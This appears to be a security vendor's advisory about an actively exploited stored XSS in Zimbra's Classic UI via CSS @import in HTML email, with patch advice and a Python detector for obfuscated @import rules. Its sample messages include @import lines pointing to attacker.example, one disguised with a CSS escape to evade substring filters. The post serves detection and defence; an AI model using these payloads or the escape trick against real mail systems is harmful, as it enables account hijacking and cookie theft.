Code Defence Cyber security

High-severity Zimbra XSS flaw added to CISA KEV following active attacks. 🐚

Your corporate email is being targeted through malicious CSS @import directives. 🐚

CVE-2025-66376 · Severity 7.2 (High) · Actively exploited stored XSS in Zimbra Collaboration Suite.

CISA has added a stored cross-site scripting (XSS) vulnerability in the Zimbra Classic UI to its Known Exploited Vulnerabilities catalog. Attackers are abusing CSS @import directives embedded in HTML emails: because the Classic UI fails to neutralize them, the attacker's script runs in the context of the recipient's webmail session as soon as the message is opened, with no further interaction required.

This allows threat actors to steal session cookies, hijack email accounts, and exfiltrate sensitive communications. Exploitation has been observed in targeted campaigns against government agencies and research institutions throughout early 2026.

The uncomfortable truth: a single malicious email can compromise your entire executive communication history if your mail platform fails to neutralize CSS directives such as @import, including obfuscated spellings of them.
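Why "neutralize" is harder than grepping for the string "@import": CSS at-keywords are ASCII case-insensitive, may contain backslash escapes (\69 is "i"), and may be separated from their URL by comments, so a substring check misses what a browser happily executes. The following Python is an added example written for this post, not Zimbra's code or a description of its sanitizer; the sample messages, the attacker.example hostnames and the function names are all constructed for illustration. It normalizes CSS roughly the way a tokenizer would before looking for @import rules in both <style> blocks and inline style attributes.

```python
"""Detect CSS @import rules in HTML email bodies, including obfuscated spellings.

Added example, not Zimbra code. Hostnames and sample messages are constructed.
"""
import re
from html.parser import HTMLParser

_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# CSS escape: backslash + 1..6 hex digits (+ optional single whitespace), or backslash + any char.
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n]?|\\(.)", re.S)
# An @import rule runs to the next ';' or to a brace; match on the normalised text.
_IMPORT_RULE = re.compile(r"@import\b[^;{}]*(?:;|(?=[{}])|$)", re.S)


def normalize_css(css: str) -> str:
    """Approximate what a CSS tokenizer sees: comments removed, escapes decoded,
    whitespace collapsed, ASCII-lowercased. Comment stripping errs toward flagging
    (a comment inside an identifier would not form one token in a real browser)."""
    css = _CSS_COMMENT.sub(" ", css)

    def _unescape(m: re.Match) -> str:
        if m.group(1) is not None:
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp < 0x110000 else "\ufffd"
        return m.group(2)

    css = _CSS_ESCAPE.sub(_unescape, css)
    return re.sub(r"\s+", " ", css).lower()


def find_css_imports(css: str) -> list[str]:
    """Return every @import rule found in one stylesheet body, normalised."""
    return [m.group(0).strip() for m in _IMPORT_RULE.finditer(normalize_css(css))]


class _StyleCollector(HTMLParser):
    """Collect <style> element bodies and inline style="" attribute values."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.sheets: list[str] = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
        for name, value in attrs:
            if name == "style" and value:
                self.sheets.append(value)  # @import never belongs in an inline style

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self.sheets.append(data)


def css_imports_in_html(html: str) -> list[str]:
    """All @import rules in an HTML message body; non-empty means quarantine/rewrite."""
    parser = _StyleCollector()
    parser.feed(html)
    parser.close()
    found: list[str] = []
    for sheet in parser.sheets:
        found.extend(find_css_imports(sheet))
    return found


def naive_substring_check(html: str) -> bool:
    """The check a weak filter performs; kept here only to show what it misses."""
    return "@import" in html.lower()


# Constructed sample messages (not real campaign artifacts).
BENIGN = '<html><head><style>body { font-family: Arial; }</style></head><body>Hi</body></html>'
PLAIN_IMPORT = '<style>@import url("https://attacker.example/x.css");</style>'
# "\69 " is the CSS escape for "i"; a browser reads this as @import, a substring check does not.
OBFUSCATED = '<style>@\\69 mport url(https://attacker.example/y.css);</style>'

if __name__ == "__main__":
    for label, msg in [("benign", BENIGN), ("plain", PLAIN_IMPORT), ("obfuscated", OBFUSCATED)]:
        print(label, "naive:", naive_substring_check(msg), "normalised:", css_imports_in_html(msg))
```

Run it and the obfuscated message is the interesting row: the naive check returns False while the normalized scan reports the decoded @import rule. A mail-platform filter should drop or rewrite any message where css_imports_in_html returns a non-empty list, since legitimate marketing mail has no business importing external stylesheets into a webmail session.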

→ Update Synacor Zimbra Collaboration Suite to version 9.0.0 P41, 10.0.9, or 10.1.1 immediately.

→ Instruct users to use the Modern UI where possible, as the vulnerability primarily affects the Classic UI.

→ Monitor webmail access logs and egress traffic for anomalies tied to user sessions: requests from message bodies to unfamiliar external hosts, logins from unexpected locations, and bulk message reads or exports that suggest a hijacked account.

#Cybersecurity #EmailSecurity #Zimbra #VulnerabilityManagement #SOC #CodeDefence
